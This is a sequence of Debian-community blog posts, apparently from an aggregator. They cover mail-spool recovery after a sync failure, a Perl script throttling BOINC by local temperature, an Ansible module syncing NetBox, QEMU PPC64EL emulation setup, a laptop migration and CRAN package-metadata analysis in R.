And things looked okay. Now of course if we go further back, we find mail I actually deleted (because I do do that sometimes), so it's hard to use this log as an audit trail. We can only hope that the curie spool is sufficiently coherent to be relied on. Worst case, we'll have to restore from last night's backup, but that's getting far away now: I get hundreds of mails a day in that mail spool, and reseting back to last night does not seem like a good idea. A dry run of smd-pull on angela seems to agree that it's missing some files:
default: smd-client@localhost: TAGS: stats::new-mails(154914), del-mails(0), bytes-received(0), xdelta-received(0)
... a number of mails somewhere in between the other two, go figure. A "wet" run of this was started, without deletion (-n), which gave us:
default: smd-client@localhost: TAGS: stats::new-mails(154911), del-mails(0), bytes-received(7658160107), xdelta-received(10837609)
Strange that it sync'd three less emails, but that's still better than nothing, and we have a mail spool on angela again:
anarcat@angela:~(main)$ notmuch new
purging with prefix '.': spam moved (0), ham moved (0), deleted (0), done
Note: Ignoring non-mail file: /home/anarcat/Maildir//.uidvalidity
Processed 1779 total files in 26s (66 files/sec.).
Added 1190 new messages to the database. Removed 3 messages. Detected 593 file renames.
tagging with prefix '.': spam, sent, feeds, koumbit, tor, lists, rapports, folders, done.
Notice how only 1190 messages were re-added, that is because I killed notmuch before it had time to remove all those mails from its database.

Possible causes I am totally at a loss as to why smd started destroying everything like it did. But a few things come to mind:
  1. I rewired my office on that day.
  2. This meant unplugging curie, the workstation.
  3. It has a bad CMOS battery (known problem), so it jumped around the time continuum a few times, sometimes by years.
  4. The smd services are ran from a systemd unit with OnCalendar=*:0/2. I have heard that it's possible that major time jumps "pile up" execution of jobs, and it seems this happened in this case.
  5. It's possible that locking in smd is not as great as it could be, and that it corrupted its internal data structures on curie, which led it to command a destruction of the remote mail spool.
It's also possible that there was a disk failure on the server, marcos. But since it's running on a (software) RAID-1 array, and no errors have been found (according to dmesg), I don't think that's a plausible hypothesis.

Lessons learned
  1. follow what smd says, even if it seems useless or strange.
  2. trust but verify: just backup everything before you do anything, especially the largest data set.
  3. daily backups are not great for email, unless you're ready to lose a day of email (which I'm not).
  4. hashdeep is great. I keep finding new use cases for it. Last time it was to audit my camera SD card to make sure I didn't forget anything, and now this. it's fast and powerful.
  5. borg is great too. the FUSE mount was especially useful, and it was pretty fast to explore the backup, even through that overhead: checksumming 15GB of mail took about 35 minutes, which gives a respectable 8MB/s, probably bottlenecked by the crap external USB drive I use for backups (!).
  6. I really need to finish my backup system so that I have automated offsite backups, although in this case that would actually have been much slower (certainly not 8MB/s!).

Workarounds and solutions I setup fake-hwclock on curie, so that the next power failure will not upset my clock that badly. I am thinking of switching to ZFS or BTRFS for most of my filesystems, so that I can use filesystem snapshots (including remotely!) as a backup strategy. This seems so much more powerful than crawling the filesystem for changes, and allows for truly offsite backups protected from an attacker (hopefully). But it's a long way there. I'm also thinking of rebuilding my mail setup without smd. It's not the first time something like this happens with smd. It's the first time I am more confident it's the root cause of the problem, however, and it makes me really nervous for the future. I have used offlineimap in the past and it seems it was finally ported to Python 3 so that could be an option again. isync/mbsync is another option, which I tried before but do not remember why I didn't switch. A complete redesign with something like getmail and/or nncp could also be an option. But alas, I lack the time to go crazy with those experiments. Somehow, doing like everyone else and just going with Google still doesn't seem to be an option for me. Screw big tech. But I am afraid they will win, eventually. In any case, I'm just happy I got mail again, strangely.

5 January 2021

Russell Coker: Weather and Boinc

I just wrote a Perl script to look at the Australian Bureau of Meteorology pages to find the current temperature in an area and then adjust BOINC settings accordingly. The Perl script (in this post after the break, which shouldn t be in the RSS feed) takes the URL of a Bureau of Meteorology observation point as ARGV[0] and parses that to find the current (within the last hour) temperature. Then successive command line arguments are of the form 24:100 and 30:50 which indicate that at below 24C 100% of CPU cores should be used and below 30C 50% of CPU cores should be used. In warm weather having a couple of workstations in a room running BOINC (or any other CPU intensive task) will increase the temperature and also make excessive noise from cooling fans. To change the number of CPU cores used the script changes /etc/boinc-client/global_prefs_override.xml and then tells BOINC to reload that config file. This code is a little ugly (it doesn t properly parse XML, it just replaces a line of text) and could fail on a valid configuration file that wasn t produced by the current BOINC code. The parsing of the BoM page is a little ugly too, it relies on the HTML code in the BoM page they could make a page that looks identical which breaks the parsing or even a page that contains the same data that looks different. It would be nice if the BoM published some APIs for getting the weather. One thing that would be good is TXT records in the DNS. DNS supports caching with specified lifetime and is designed for high throughput in aggregate. If you had a million IOT devices polling the current temperature and forecasts every minute via DNS the people running the servers wouldn t even notice the load, while a million devices polling a web based API would be a significant load. As an aside I recommend playing nice and only running such a script every 30 minutes, the BoM page seems to be updated on the half hour so I have my cron jobs running at 5 and 35 minutes past the hour. If this code works for you then that s great. If it merely acts as an inspiration for developing your own code then that s great too! BOINC users outside Australia could replace the code for getting meteorological data (or even interface to a digital thermometer). Australians who use other CPU intensive batch jobs could take the BoM parsing code and replace the BOINC related code. If you write scripts inspired by this please blog about it and comment here with a link to your blog post.
#!/usr/bin/perl
use strict;
use Sys::Syslog;
# St Kilda Harbour RMYS
# http://www.bom.gov.au/products/IDV60901/IDV60901.95864.shtml
my $URL = $ARGV[0];
open(IN, "wget -o /dev/null -O - $URL ") or die "Can't get $URL";
while(<IN>)
 
  if($_ =~ /tr class=.rowleftcolumn/)
   
    last;
   
 
sub get_data
 
  if(not $_[0] =~ /headers=.t1-$_[1]/)
   
    return undef;
   
  $_[0] =~ s/^.*headers=.t1-$_[1]..//;
  $_[0] =~ s/<.td.*$//;
  return $_[0];
 
my @datetime;
my $cur_temp -100;
while(<IN>)
 
  chomp;
  if($_ =~ /^<.tr>$/)
   
    last;
   
  my $res;
  if($res = get_data($_, "datetime"))
   
    @datetime = split(/\//, $res)
   
  elsif($res = get_data($_, "tmp"))
   
    $cur_temp = $res;
   
 
close(IN);
if($#datetime != 1 or $cur_temp == -100)
 
  die "Can't parse BOM data";
 
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime();
if($mday - $datetime[0] > 1 or ($datetime[0] > $mday and $mday != 1))
 
  die "Date wrong\n";
 
my $mins;
my @timearr = split(/:/, $datetime[1]);
$mins = $timearr[0] * 60 + $timearr [1];
if($timearr[1] =~ /pm/)
 
  $mins += 720;
 
if($mday != $datetime[0])
 
  $mins += 1440;
 
if($mins + 60 < $hour * 60 + $min)
 
  die "page outdated\n";
 
my %temp_hash;
foreach ( @ARGV[1..$#ARGV] )
 
  my @tmparr = split(/:/, $_);
  $temp_hash $tmparr[0]  = $tmparr[1];
 
my @temp_list = sort(keys(%temp_hash));
my $percent = 0;
my $i;
for($i = $#temp_list; $i >= 0 and $temp_list[$i] > $cur_temp; $i--)
 
  $percent = $temp_hash $temp_list[$i] 
 
my $prefs = "/etc/boinc-client/global_prefs_override.xml";
open(IN, "<$prefs") or die "Can't read $prefs";
my @prefs_contents;
while(<IN>)
 
  push(@prefs_contents, $_);
 
close(IN);
openlog("boincmgr-cron", "", "daemon");
my @cpus_pct = grep(/max_ncpus_pct/, @prefs_contents);
my $cpus_line = $cpus_pct[0];
$cpus_line =~ s/..max_ncpus_pct.$//;
$cpus_line =~ s/^.*max_ncpus_pct.//;
if($cpus_line == $percent)
 
  syslog("info", "Temp $cur_temp" . "C, already set to $percent");
  exit 0;
 
open(OUT, ">$prefs.new") or die "Can't read $prefs.new";
for($i = 0; $i <= $#prefs_contents; $i++)
 
  if($prefs_contents[$i] =~ /max_ncpus_pct/)
   
    print OUT "   <max_ncpus_pct>$percent.000000</max_ncpus_pct>\n";
   
  else
   
    print OUT $prefs_contents[$i];
   
 
close(OUT);
rename "$prefs.new", "$prefs" or die "can't rename";
system("boinccmd --read_global_prefs_override");
syslog("info", "Temp $cur_temp" . "C, set percentage to $percent");

19 September 2020

Vincent Bernat: Syncing NetBox with a custom Ansible module

The netbox.netbox collection from Ansible Galaxy provides several modules to update NetBox objects:
- name: create a device in NetBox
  netbox_device:
    netbox_url: http://netbox.local
    netbox_token: s3cret
    data:
      name: to3-p14.sfo1.example.com
      device_type: QFX5110-48S
      device_role: Compute Switch
      site: SFO1
However, if NetBox is not your source of truth, you may want to ensure it stays in sync with your configuration management database1 by removing outdated devices or IP addresses. While it should be possible to glue together a playbook with a query, a loop and some filtering to delete unwanted elements, it feels clunky, inefficient and an abuse of YAML as a programming language. A specific Ansible module solves this issue and is likely more flexible.

Notice I recommend that you read Writing a custom Ansible module as an introduction, as well as Syncing MySQL tables for a first simpler example.

Code The module has the following signature and it syncs NetBox with the content of the provided YAML file:
netbox_sync:
  source: netbox.yaml
  api: https://netbox.example.com
  token: s3cret
The synchronized objects are:
  • sites,
  • manufacturers,
  • device types,
  • device roles,
  • devices, and
  • IP addresses.
In our environment, the YAML file is generated from our configuration management database and contains a set of devices and a list of IP addresses:
devices:
  ad2-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Cisco
     model: Catalyst 2960G-48TC-L
     role: net_tor_oob_switch
  to1-p6.sfo1.example.com:
     datacenter: sfo1
     manufacturer: Juniper
     model: QFX5110-48S
     role: net_tor_gpu_switch
# [ ]
ips:
  - device: ad2-p6.example.com
    ip: 172.31.115.18/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.115.33/21
    interface: oob
  - device: to1-p6.example.com
    ip: 172.31.254.33/32
    interface: lo0.0
# [ ]
The network team is not the sole tenant in NetBox. While adding new objects or modifying existing ones should be relatively safe, deleting unwanted objects can be risky. The module only deletes objects it did create or modify. To identify them, it marks them with a specific tag, cmdb. Most objects in NetBox accept tags.

Module definition Starting from the skeleton described in the previous article, we define the module:
module_args = dict(
    source=dict(type='path', required=True),
    api=dict(type='str', required=True),
    token=dict(type='str', required=True, no_log=True),
    max_workers=dict(type='int', required=False, default=10)
)
result = dict(
    changed=False
)
module = AnsibleModule(
    argument_spec=module_args,
    supports_check_mode=True
)
It contains an additional optional arguments defining the number of workers to talk to NetBox and query the existing objects in parallel to speedup the execution.

Abstracting synchronization We need to synchronize different object types, but once we have a list of objects we want in NetBox, the grunt work is always the same:
  • check if the objects already exist,
  • retrieve them and put them in a form suitable for comparison,
  • retrieve the extra objects we don t want anymore,
  • compare the two sets, and
  • add missing objects, update existing ones, delete extra ones.
We code these behaviours into a Synchronizer abstract class. For each kind of object, a concrete class is built with the appropriate class attributes to tune its behaviour and a wanted() method to provide the objects we want. I am not explaining the abstract class code here. Have a look at the source if you want.

Synchronizing tags and tenants As a starter, here is how we define the class synchronizing the tags:
class SyncTags(Synchronizer):
    app = "extras"
    table = "tags"
    key = "name"
    def wanted(self):
        return  "cmdb": dict(
            slug="cmdb",
            color="8bc34a",
            description="synced by network CMDB") 
The app and table attributes defines the NetBox objects we want to manipulate. The key attribute is used to determine how to lookup for existing objects. In this example, we want to lookup tags using their names. The wanted() method is expected to return a dictionary mapping object keys to the list of wanted attributes. Here, the keys are tag names and we create only one tag, cmdb, with the provided slug, color and description. This is the tag we will use to mark the objects we create or modify. If the tag does not exist, it is created. If it exists, the provided attributes are updated. Other attributes are left untouched. We also want to create a specific tenant for objects accepting such an attribute (devices and IP addresses):
class SyncTenants(Synchronizer):
    app = "tenancy"
    table = "tenants"
    key = "name"
    def wanted(self):
        return  "Network": dict(slug="network",
                                description="Network team") 

Synchronizing sites We also need to synchronize the list of sites. This time, the wanted() method uses the information provided in the YAML file: it walks the devices and builds a set of datacenter names.
class SyncSites(Synchronizer):
    app = "dcim"
    table = "sites"
    key = "name"
    only_on_create = ("status", "slug")
    def wanted(self):
        result = set(details["datacenter"]
                     for details in self.source['devices'].values()
                     if "datacenter" in details)
        return  k: dict(slug=k,
                        status="planned")
                for k in result 
Thanks to the use of the only_on_create attribute, the specified attributes are not updated if they are different. The goal of this synchronizer is mostly to collect the references to the different sites for other objects.
>>> pprint(SyncSites(**sync_args).wanted())
 'sfo1':  'slug': 'sfo1', 'status': 'planned' ,
 'chi1':  'slug': 'chi1', 'status': 'planned' ,
 'nyc1':  'slug': 'nyc1', 'status': 'planned' 

Synchronizing manufacturers, device types and device roles The synchronization of manufacturers is pretty similar, except we do not use the only_on_create attribute:
class SyncManufacturers(Synchronizer):
    app = "dcim"
    table = "manufacturers"
    key = "name"
    def wanted(self):
        result = set(details["manufacturer"]
                     for details in self.source['devices'].values()
                     if "manufacturer" in details)
        return  k:  "slug": slugify(k) 
                for k in result 
Regarding the device types, we use the foreign attribute linking a NetBox attribute to the synchronizer handling it.
class SyncDeviceTypes(Synchronizer):
    app = "dcim"
    table = "device_types"
    key = "model"
    foreign =  "manufacturer": SyncManufacturers 
    def wanted(self):
        result = set((details["manufacturer"], details["model"])
                     for details in self.source['devices'].values()
                     if "model" in details)
        return  k[1]: dict(manufacturer=k[0],
                           slug=slugify(k[1]))
                for k in result 
The wanted() method refers to the manufacturer using its key attribute. In this case, this is the manufacturer name.
>>> pprint(SyncManufacturers(**sync_args).wanted())
 'Cisco':  'slug': 'cisco' ,
 'Dell':  'slug': 'dell' ,
 'Juniper':  'slug': 'juniper' 
>>> pprint(SyncDeviceTypes(**sync_args).wanted())
 'ASR 9001':  'manufacturer': 'Cisco', 'slug': 'asr-9001' ,
 'Catalyst 2960G-48TC-L':  'manufacturer': 'Cisco',
                           'slug': 'catalyst-2960g-48tc-l' ,
 'MX10003':  'manufacturer': 'Juniper', 'slug': 'mx10003' ,
 'QFX10002-36Q':  'manufacturer': 'Juniper', 'slug': 'qfx10002-36q' ,
 'QFX10002-72Q':  'manufacturer': 'Juniper', 'slug': 'qfx10002-72q' ,
 'QFX5110-32Q':  'manufacturer': 'Juniper', 'slug': 'qfx5110-32q' ,
 'QFX5110-48S':  'manufacturer': 'Juniper', 'slug': 'qfx5110-48s' ,
 'QFX5200-32C':  'manufacturer': 'Juniper', 'slug': 'qfx5200-32c' ,
 'S4048-ON':  'manufacturer': 'Dell', 'slug': 's4048-on' ,
 'S6010-ON':  'manufacturer': 'Dell', 'slug': 's6010-on' 
The device roles are defined like this:
class SyncDeviceRoles(Synchronizer):
    app = "dcim"
    table = "device_roles"
    key = "name"
    def wanted(self):
        result = set(details["role"]
                     for details in self.source['devices'].values()
                     if "role" in details)
        return  k: dict(slug=slugify(k),
                        color="8bc34a")
                for k in result 

Synchronizing devices A device is mostly a name with references to a role, a model, a datacenter and a tenant. These references are declared as foreign keys using the synchronizers defined previously.
class SyncDevices(Synchronizer):
    app = "dcim"
    table = "devices"
    key = "name"
    foreign =  "device_role": SyncDeviceRoles,
               "device_type": SyncDeviceTypes,
               "site": SyncSites,
               "tenant": SyncTenants 
    remove_unused = 10
    def wanted(self):
        return  name: dict(device_role=details["role"],
                           device_type=details["model"],
                           site=details["datacenter"],
                           tenant="Network")
                for name, details in self.source['devices'].items()
                if  "datacenter", "model", "role"  <= set(details.keys()) 
The remove_unused attribute is a safety implemented to fail if we have to delete more than 10 devices: this may be the indication there is a bug somewhere, unless one of your datacenter suddenly caught fire.
>>> pprint(SyncDevices(**sync_args).wanted())
 'ad2-p6.sfo1.example.com':  'device_role': 'net_tor_oob_switch',
                             'device_type': 'Catalyst 2960G-48TC-L',
                             'site': 'sfo1',
                             'tenant': 'Network' ,
 'to1-p6.sfo1.example.com':  'device_role': 'net_tor_gpu_switch',
                             'device_type': 'QFX5110-48S',
                             'site': 'sfo1',
                             'tenant': 'Network' ,
[ ]

Synchronizing IP addresses The last step is to synchronize IP addresses. We do not attach them to a device.2 Instead, we specify the device names in the description of the IP address:
class SyncIPs(Synchronizer):
    app = "ipam"
    table = "ip-addresses"
    key = "address"
    foreign =  "tenant": SyncTenants 
    remove_unused = 1000
    def wanted(self):
        wanted =  
        for details in self.source['ips']:
            if details['ip'] in wanted:
                wanted[details['ip']]['description'] = \
                    f" details['device']  (and others)"
            else:
                wanted[details['ip']] = dict(
                    tenant="Network",
                    status="active",
                    dns_name="",        # information is present in DNS
                    description=f" details['device'] :  details['interface'] ",
                    role=None,
                    vrf=None)
        return wanted
There is a slight difficulty: NetBox allows duplicate IP addresses, so a simple lookup is not enough. In case of multiple matches, we choose the best by preferring those tagged with cmdb, then those already attached to an interface:
def get(self, key):
    """Grab IP address from NetBox."""
    # There may be duplicate. We need to grab the "best".
    results = super(Synchronizer, self).get(key)
    if len(results) == 0:
        return None
    if len(results) == 1:
        return results[0]
    scores = [0]*len(results)
    for idx, result in enumerate(results):
        if "cmdb" in result.tags:
            scores[idx] += 10
        if result.interface is not None:
            scores[idx] += 5
    return sorted(zip(scores, results),
                  reverse=True, key=lambda k: k[0])[0][1]

Getting the current and wanted states Each synchronizer is initialized with a reference to the Ansible module, a reference to a pynetbox s API object, the data contained in the provided YAML file and two empty dictionaries for the current and expected states:
source = yaml.safe_load(open(module.params['source']))
netbox = pynetbox.api(module.params['api'],
                      token=module.params['token'])
sync_args = dict(
    module=module,
    netbox=netbox,
    source=source,
    before= ,
    after= 
)
synchronizers = [synchronizer(**sync_args) for synchronizer in [
    SyncTags,
    SyncTenants,
    SyncSites,
    SyncManufacturers,
    SyncDeviceTypes,
    SyncDeviceRoles,
    SyncDevices,
    SyncIPs
]]
Each synchronizer has a prepare() method whose goal is to compute the current and wanted states. It returns True in case of a difference:
# Check what needs to be synchronized
try:
    for synchronizer in synchronizers:
        result['changed']  = synchronizer.prepare()
except AnsibleError as e:
    result['msg'] = e.message
    module.fail_json(**result)

Applying changes Back to the skeleton described in the previous article, the last step is to apply the changes if there is a difference between these states. Each synchronizer registers the current and wanted states in sync_args["before"][table] and sync_args["after"][table] where table is the name of the table for a given NetBox object type. The diff object is a bit elaborate as it is built table by table. This enables Ansible to display the name of each table before the diff representation:
# Compute the diff
if module._diff and result['changed']:
    result['diff'] = [
        dict(
            before_header=table,
            after_header=table,
            before=yaml.safe_dump(sync_args["before"][table]),
            after=yaml.safe_dump(sync_args["after"][table]))
        for table in sync_args["after"]
        if sync_args["before"][table] != sync_args["after"][table]
    ]
# Stop here if check mode is enabled or if no change
if module.check_mode or not result['changed']:
    module.exit_json(**result)
Each synchronizer also exposes a synchronize() method to apply changes and a cleanup() method to delete unwanted objects. Order is important due to the relation between the objects.
# Synchronize
for synchronizer in synchronizers:
    synchronizer.synchronize()
for synchronizer in synchronizers[::-1]:
    synchronizer.cleanup()
module.exit_json(**result)

The complete code is available on GitHub. Compared to using netbox.netbox collection, the logic is written in Python instead of trying to glue Ansible tasks together. I believe this is both more flexible and easier to read, notably when trying to delete outdated objects. While I did not test it, it should also be faster. An alternative would have been to reuse code from the netbox.netbox collection, as it contains similar primitives. Unfortunately, I didn t think of it until now.

  1. In my opinion, a good option for a source of truth is to use YAML files in a Git repository. You get versioning for free and people can get started with a text editor.
  2. This limitation is mostly due to laziness: we do not really care about this information. Our main motivation for putting IP addresses in NetBox is to keep track of the used IP addresses. However, if an IP address is already attached to an interface, we leave this association untouched.

14 July 2020

Russell Coker: Debian PPC64EL Emulation

In my post on Debian S390X Emulation [1] I mentioned having problems booting a Debian PPC64EL kernel under QEMU. Giovanni commented that they had PPC64EL working and gave a link to their site with Debian QEMU images for various architectures [2]. I tried their image which worked then tried mine again which also worked it seemed that a recent update in Debian/Unstable fixed the bug that made QEMU not work with the PPC64EL kernel. Here are the instructions on how to do it. First you need to create a filesystem in an an image file with commands like the following:
truncate -s 4g /vmstore/ppc
mkfs.ext4 /vmstore/ppc
mount -o loop /vmstore/ppc /mnt/tmp
Then visit the Debian Netinst page [3] to download the PPC64EL net install ISO. Then loopback mount it somewhere convenient like /mnt/tmp2. The package qemu-system-ppc has the program for emulating a PPC64LE system, the qemu-user-static package has the program for emulating PPC64LE for a single program (IE a statically linked program or a chroot environment), you need this to run debootstrap. The following commands should be most of what you need.
apt install qemu-system-ppc qemu-user-static
update-binfmts --display
# qemu ppc64 needs exec stack to solve "Could not allocate dynamic translator buffer"
# so enable that on SE Linux systems
setsebool -P allow_execstack 1
debootstrap --foreign --arch=ppc64el --no-check-gpg buster /mnt/tmp file:///mnt/tmp2
chroot /mnt/tmp /debootstrap/debootstrap --second-stage
cat << END > /mnt/tmp/etc/apt/sources.list
deb http://mirror.internode.on.net/pub/debian/ buster main
deb http://security.debian.org/ buster/updates main
END
echo "APT::Install-Recommends False;" > /mnt/tmp/etc/apt/apt.conf
echo ppc64 > /mnt/tmp/etc/hostname
# /usr/bin/awk: error while loading shared libraries: cannot restore segment prot after reloc: Permission denied
# only needed for chroot
setsebool allow_execmod 1
chroot /mnt/tmp apt update
# why aren't they in the default install?
chroot /mnt/tmp apt install perl dialog
chroot /mnt/tmp apt dist-upgrade
chroot /mnt/tmp apt install bash-completion locales man-db openssh-server build-essential systemd-sysv ifupdown vim ca-certificates gnupg
# install kernel last because systemd install rebuilds initrd
chroot /mnt/tmp apt install linux-image-ppc64el
chroot /mnt/tmp dpkg-reconfigure locales
chroot /mnt/tmp passwd
cat << END > /mnt/tmp/etc/fstab
/dev/vda / ext4 noatime 0 0
#/dev/vdb none swap defaults 0 0
END
mkdir /mnt/tmp/root/.ssh
chmod 700 /mnt/tmp/root/.ssh
cp ~/.ssh/id_rsa.pub /mnt/tmp/root/.ssh/authorized_keys
chmod 600 /mnt/tmp/root/.ssh/authorized_keys
rm /mnt/tmp/vmlinux* /mnt/tmp/initrd*
mkdir /boot/ppc64
cp /mnt/tmp/boot/[vi]* /boot/ppc64
# clean up
umount /mnt/tmp
umount /mnt/tmp2
# setcap binary for starting bridged networking
setcap cap_net_admin+ep /usr/lib/qemu/qemu-bridge-helper
# afterwards set the access on /etc/qemu/bridge.conf so it can only
# be read by the user/group permitted to start qemu/kvm
echo "allow all" > /etc/qemu/bridge.conf
Here is an example script for starting kvm. It can be run by any user that can read /etc/qemu/bridge.conf.
#!/bin/bash
set -e
KERN="kernel /boot/ppc64/vmlinux-4.19.0-9-powerpc64le -initrd /boot/ppc64/initrd.img-4.19.0-9-powerpc64le"
# single network device, can have multiple
NET="-device e1000,netdev=net0,mac=02:02:00:00:01:04 -netdev tap,id=net0,helper=/usr/lib/qemu/qemu-bridge-helper"
# random number generator for fast start of sshd etc
RNG="-object rng-random,filename=/dev/urandom,id=rng0 -device virtio-rng-pci,rng=rng0"
# I have lockdown because it does no harm now and is good for future kernels
# I enable SE Linux everywhere
KERNCMD="net.ifnames=0 noresume security=selinux root=/dev/vda ro lockdown=confidentiality"
kvm -drive format=raw,file=/vmstore/ppc64,if=virtio $RNG -nographic -m 1024 -smp 2 $KERN -curses -append "$KERNCMD" $NET

9 July 2020

Enrico Zini: Laptop migration

This laptop used to be extra-flat My laptop battery started to explode in slow motion. HP requires 10 business days to repair my laptop under warranty, and I cannot afford that length of downtime. Alternatively, HP quoted me 375 + VAT for on-site repairs, which I tought was very funny. For 376.55 + VAT, which is pretty much exactly the same amount, I bought instead a refurbished ThinkPad X240 with a dual-core I5, 8G of RAM, 250G SSD, and a 1920x1080 IPS display, to use as a spare while my laptop is being repaired. I'd like to thank HP for giving me the opportunity to own a ThinkPad. Since I'm migrating all my system to the spare and then (hopefully) back, I'm documenting what I need to be fully productive on new hardware. Install Debian A basic Debian netinst with no tasks selected is good enough to get going. Note that if wifi worked in Debian Installer, it doesn't mean that it will work in the minimal system it installed. See here for instructions on quickly bringing up wifi on a newly installed minimal system. Copy /home A simple tar of /home is all I needed to copy my data over. A neat way to do it was connecting the two laptops with an ethernet cable, and using netcat:
# On the source
tar -C / -zcf - home   nc -l -p 12345 -N
# On the target
nc 10.0.0.1 12345   tar -C / -zxf -
Since the data travel unencrypted in this way, don't do it over wifi. Install packages I maintain a few simple local metapackages that depend on the packages I usually used. I could just install those and let apt bring in their dependencies. For the build dependencies of the programs I develop, I use mk-build-deps from the devscripts package to create metapackages that make sure they are installed. Here's an extract from debian/control of the metapackage:
Source: enrico
Section: admin
Priority: optional
Maintainer: Enrico Zini <enrico@debian.org>
Build-Depends: debhelper (>= 11)
Standards-Version: 3.7.2.1
Package: enrico
Section: admin
Architecture: all
Depends:
  mc, mmv, moreutils, powertop, syncmaildir, notmuch,
  ncdu, vcsh, ddate, jq, git-annex, eatmydata,
  vdirsyncer, khal, etckeeper, moc, pwgen
Description: Enrico's working environment
Package: enrico-devel
Section: devel
Architecture: all
Depends:
  git, python3-git, git-svn, gitk, ansible, fabric,
  valgrind, kcachegrind, zeal, meld, d-feet, flake8, mypy, ipython3,
  strace, ltrace
Description: Enrico's development environment
Package: enrico-gui
Section: x11
Architecture: all
Depends:
  xclip, gnome-terminal, qalculate-gtk, liferea, gajim,
  mumble, sm, syncthing, virt-manager
Recommends: k3b
Description: Enrico's GUI environment
Package: enrico-sanity
Section: admin
Architecture: all
Conflicts: libapache2-mod-php, libapache2-mod-php5, php5, php5-cgi, php5-fpm, libapache2-mod-php7.0, php7.0, libphp7.0-embed, libphp-embed, libphp5-embed
Description: Enrico's sanity
 Metapackage with a list of packages that I do not want anywhere near my
 system.
System-wide customizations I tend to avoid changing system-wide configuration as much as possible, so copying over /home and installing packages takes care of 99% of my needs. There are a few system-wide tweaks I cannot do without: For postfix, I have a little ansible playbook that takes care of it. Network Manager system connections need to be copied manually: a plain copy and a systemctl restart network-manager are enough. Note that Network Manager will ignore the files unless their owner and permissions are what it expects. Fine tuning Comparing the output of dpkg --get-selections between the old and the new system might highlight packages manually installed in a hurry and not added to the metapackages. Finally, what remains is fixing the sad state of mimetype associations, which seem to associate opening file depending on whatever application was installed last, phases of the moon, and what option is the most annoying. Currently on my system, PDFs are opened in inkscape by xdg-open and in calibre by run-mailcap. Let's see how long it takes to figure this one out.

9 May 2020

Thorsten Alteholz: My Debian Activities in April 2020

FTP master This month I accepted 384 packages and rejected 47. The overall number of packages that got accepted was 457. Debian LTS This was my seventieth month that I did some work for the Debian LTS initiative, started by Raphael Hertzog at Freexian. This month my all in all workload has been 28.75h. During that time I did LTS uploads of: As there have been lots of no-dsa-CVEs I continued my work on wireshark. Last but not least I did some days of frontdesk duties. Debian ELTS This month was the twenty second ELTS month. During my small allocated time I only uploaded: I also did some days of frontdesk duties. Other stuff Unfortunately this month again strange things happened outside Debian and I only got some stuff done. I improved packaging of I sponsored uploads of I uploaded the new package On my Go challenge I uploaded:
golang-github-facebookgo-subset, golang-github-facebookgo-ensure, golang-github-shurcool-gopherjslib, golang-github-grafana-grafana-plugin-model, golang-github-crewjam-httperr, golang-github-hashicorp-terraform-svchost, golang-github-neelance-sourcemap, golang-github-neelance-astrewrite, golang-github-kisielk-gotool, golang-github-gopherjs-gopherjs, golang-github-yvasiyarov-newrelic-platform-go, golang-github-rhnvrm-simples3, golang-github-robfig-go-cache, golang-github-xorcare-pointer, golang-github-goburrow-serial

15 April 2017

Dirk Eddelbuettel: #5: Easy package information

Welcome to the fifth post in the recklessly rambling R rants series, or R4 for short. The third post showed an easy way to follow R development by monitoring (curated) changes on the NEWS file for the development version r-devel. As a concrete example, I mentioned that it has shown a nice new function (tools::CRAN_package_db()) coming up in R 3.4.0. Today we will build on that. Consider the following short snippet:
library(data.table)
getPkgInfo <- function()  
    if (exists("tools::CRAN_package_db"))  
        dat <- tools::CRAN_package_db()
      else  
        tf <- tempfile()
        download.file("https://cloud.r-project.org/src/contrib/PACKAGES.rds", tf, quiet=TRUE)
        dat <- readRDS(tf)              # r-devel can now readRDS off a URL too
     
    dat <- as.data.frame(dat)
    setDT(dat)
    dat
 
It defines a simple function getPkgInfo() as a wrapper around said new function from R 3.4.0, ie tools::CRAN_package_db(), and a fallback alternative using a tempfile (in the automagically cleaned R temp directory) and an explicit download and read of the underlying RDS file. As an aside, just this week the r-devel NEWS told us that such readRDS() operations can now read directly from URL connection. Very nice---as RDS is a fantastic file format when you are working in R. Anyway, back to the RDS file! The snippet above returns a data.table object with as many rows as there are packages on CRAN, and basically all their (parsed !!) DESCRIPTION info and then some. A gold mine! Consider this to see how many package have a dependency (in the sense of Depends, Imports or LinkingTo, but not Suggests because Suggests != Depends) on Rcpp:
R> dat <- getPkgInfo()
R> rcppRevDepInd <- as.integer(tools::dependsOnPkgs("Rcpp", recursive=FALSE, installed=dat))
R> length(rcppRevDepInd)
[1] 998
R>
So exciting---we will hit 1000 within days! But let's do some more analysis:
R> dat[ rcppRevDepInd, RcppRevDep := TRUE]  # set to TRUE for given set
R> dat[ RcppRevDep==TRUE, 1:2]
           Package Version
  1:      ABCoptim  0.14.0
  2: AbsFilterGSEA     1.5
  3:           acc   1.3.3
  4: accelerometry   2.2.5
  5:      acebayes   1.3.4
 ---                      
994:        yakmoR   0.1.1
995:  yCrypticRNAs  0.99.2
996:         yuima   1.5.9
997:           zic     0.9
998:       ziphsmm   1.0.4
R>
Here we index the reverse dependency using the vector we had just computed, and then that new variable to subset the data.table object. Given the aforementioned parsed information from all the DESCRIPTION files, we can learn more:
R> ## likely false entries
R> dat[ RcppRevDep==TRUE, ][NeedsCompilation!="yes", c(1:2,4)]
            Package Version                                                                         Depends
 1:         baitmet   1.0.0                                                           Rcpp, erah (>= 1.0.5)
 2:           bea.R   1.0.1                                                        R (>= 3.2.1), data.table
 3:            brms   1.6.0                     R (>= 3.2.0), Rcpp (>= 0.12.0), ggplot2 (>= 2.0.0), methods
 4: classifierplots   1.3.3                             R (>= 3.1), ggplot2 (>= 2.2), data.table (>= 1.10),
 5:           ctsem   2.3.1                                           R (>= 3.2.0), OpenMx (>= 2.3.0), Rcpp
 6:        DeLorean   1.2.4                                                  R (>= 3.0.2), Rcpp (>= 0.12.0)
 7:            erah   1.0.5                                                               R (>= 2.10), Rcpp
 8:             GxM     1.1                                                                              NA
 9:             hmi   0.6.3                                                                    R (>= 3.0.0)
10:        humarray     1.1 R (>= 3.2), NCmisc (>= 1.1.4), IRanges (>= 1.22.10),\nGenomicRanges (>= 1.16.4)
11:         iNextPD   0.3.2                                                                    R (>= 3.1.2)
12:          joinXL   1.0.1                                                                    R (>= 3.3.1)
13:            mafs   0.0.2                                                                              NA
14:            mlxR   3.1.0                                                           R (>= 3.0.1), ggplot2
